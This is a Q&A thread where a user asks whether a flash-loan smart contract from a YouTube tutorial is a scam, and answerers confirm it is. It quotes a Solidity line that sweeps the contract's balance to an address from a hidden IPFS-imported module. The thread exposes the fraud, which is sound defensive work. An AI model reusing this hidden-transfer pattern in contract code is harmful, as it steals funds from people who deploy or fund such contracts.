# Is this smart contract code malicious?

Tags: solidity, remix, pancakeswap, flash-loans

I was looking at the code here:
https://0bin.net/paste/Y0Vas-gl#qPO+In23eGFEftdhXP7hWqIkI2xfyqxEbyjL-beMsLH

which is shown in a tutorial about flash loans:
https://www.youtube.com/watch?v=o9o141Luzzo&ab_channel=CryptoBlockchainBitcoin

But after looking at the code, if I am not wrong, the coder is transferring tokens from your wallet to his address. Am I wrong?

I see him importing a custom module without any code other than a function that returns an address of which he uses it like this:

```
address(uint160(manager.pancakeDepositAddress())).transfer(address(this).balance);
```

If it's indeed a scam, it's frustrating to see this field full of scammers like this. Makes it hard and painful to learn.

Answer (score 2, accepted):

**TL;DR Yes, it's a scam.**

The functions used are hidden in the Manager object imported with this line `import "ipfs://Qmf5Ua79ZT8ERFa9q32fQtGuWkqk1eZXxnzRdeTi6wvzUy"`. I cannot see that code, but it probably transfers BNB sent to the contract to the scammer address as you mention.

The code that is commented out in the contract makes not sense at all. It would not perform an arbitrage. Also, a flash loan arbitrage would not require that you send BNB to the contract performing the arbitrage.

Comment: Yes indeed that's what set me off. I could actually read the code by putting that url into my browser. Scammers are getting better. But one thing I am not sure if how much BNB he is able to get. Is there a way to get the entire balance of a certain token from an account? like sender.balance()?

Comment: Victims have to decide how much BNB they send to the malicious contract when calling the function. The scammer cannot take more than what the victim sends to the contract.